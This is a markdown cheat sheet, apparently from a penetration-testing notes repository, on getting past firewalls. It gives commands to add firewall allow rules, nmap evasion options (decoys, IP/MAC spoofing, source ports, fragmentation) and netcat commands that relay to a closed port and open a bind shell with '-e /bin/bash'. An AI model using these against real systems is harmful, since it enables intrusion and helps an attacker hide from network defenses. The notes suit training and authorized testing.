killchain-compendium/reverse shells/firewalls.md

2.1 KiB

Firewall Handling

Types

  • Packet filtering
  • Circuit level gateway
  • Stateful inspection
  • Proxy
  • Next generation firewall
  • Cloud firewall and FWaaS

Rules

Windows

netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869

CentOS

firewall-cmd --zone=public --add-port=57869/tcp

Circumvention

  • IP/MAC/Port spoofing
  • Fragmentation, MTU, data length
  • Header modification

nmap

Spoofing

  • Decoy -D , mixin real IP address with random adresses. Every port will be requested by any of these addresses.
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
  • Proxy
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
  • Spoofed MAC
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
  • Spoofed IP
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
  • Port Number, select a port which is whitelisted. Frequently this is 53,80,44
sudo nmap -F --source-port 443 $TARGET_IP
  • Fragmentation, eth header + 20 bytes header size + bytes fragments via -f, or 16 bytes via -ff
sudo nmap -Pn -F -f $TARGET_IP
  • MTU, works like fragmentation, -f == --mtu 8
sudo nmap -Pn -F --mtu 8 
  • DATA Length, eth header + IP header + prepend padding segment size to values of bytes
sudo nmap -Pn -F --data-length 64 $TARGET_IP

Header Fields

  • TTL
sudo nmap -Pn -F --ttl 64 $TARGET_IP
  • IP OPTIONS, --ip-options recordsas hex String

    • Route, R
    • Timestamp, T
    • Route + Timestamp, U
    • Loose source routing, L $IP $IP $IP
    • Strict source routing, S $IP $IP $IP
  • Checksum, craft bad checksum via --badsum to check errors

sudo nmap -Pn -F --badsum $TARGET_IP

After the FW

  • Hopping, listen via netcat to catch that port
  • Tunneling, relay open after passsing the firewall to connect to the closed port
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
  • Non standard ports, open bin shell via
nc -lvnp 8888 -e /bin/bash

and connect